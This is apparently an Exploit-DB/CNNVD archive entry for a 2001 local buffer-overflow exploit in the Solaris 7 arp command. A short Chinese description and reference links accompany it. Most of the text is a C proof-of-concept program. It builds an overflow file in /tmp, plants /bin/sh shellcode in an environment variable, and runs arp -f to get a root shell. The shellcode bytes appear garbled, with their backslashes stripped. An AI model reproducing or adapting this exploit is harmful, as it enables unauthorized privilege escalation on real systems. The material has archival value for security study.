https://www.exploit-db.com/exploits/250
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200103-044

Solaris7以及之前版本中arp命令存在缓冲区溢出漏洞。本地用户借助超长-f参数执行任意命令。

/*
   arp overflow proof of concept by [email protected]
   shellcode originally written by Cheez Whiz.

                              tested on x86 solaris 7,8beta
   default should work.  if not, arg1 = offset. +- by 100's

   Copyright Security-Focus.com, 11/2000
*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{
  char shell[] =
    "xebx45x9axffxffxffxffx07xff"
    "xc3x5ex31xc0x89x46xb7x88x46"
    "xbcx88x46x07x89x46x0cx31xc0"
    "xb0x2fxe8xe0xffxffxffx52x52"
    "x31xc0xb0xcbxe8xd5xffxffxff"
    "x83xc4x08x31xc0x50x8dx5ex08"
    "x53x8dx1ex89x5ex08x53xb0x3b"
    "xe8xbexffxffxffx83xc4x0cxe8"
    "xbexffxffxffx2fx62x69x6ex2f"
    "x73x68xffxffxffxffxffxffxff"
    "xffxff";

  unsigned long magic = 0x8047b78;
  unsigned long r = get_esp() + 600;
  unsigned char buf[300];
  int f;

  if (ac == 2)
    r += atoi(av[1]);

  memset(buf,0x61,sizeof(buf));
  memcpy(buf+52,&magic,4);
  memcpy(buf+76,&r,4);

  f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
  write(f,"1 2 3 4 ",8);
  write(f,buf,sizeof(buf));
  close(f);

  memset(buf,0x90,sizeof(buf));
  memcpy(buf,"LOL=",4);
  memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  putenv(buf);

  system("/usr/sbin/arp -f /tmp/ypx");
  unlink("/tmp/ypx");
}


// milw0rm.com [2001-01-15]

来源:BID
名称:2193
链接:http://www.securityfocus.com/bid/2193
来源:SUN
名称:00200
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc;=secbull/200&type;=0&nav;=sec.sba
来源:BUGTRAQ
名称:20010112arpexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97957435729702&w;=2
来源:BUGTRAQ
名称:20010111SolarisArpVulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=97934312727101&w;=2
来源:XF
名称:solaris-arp-bo(5928)
链接:http://xforce.iss.net/static/5928.php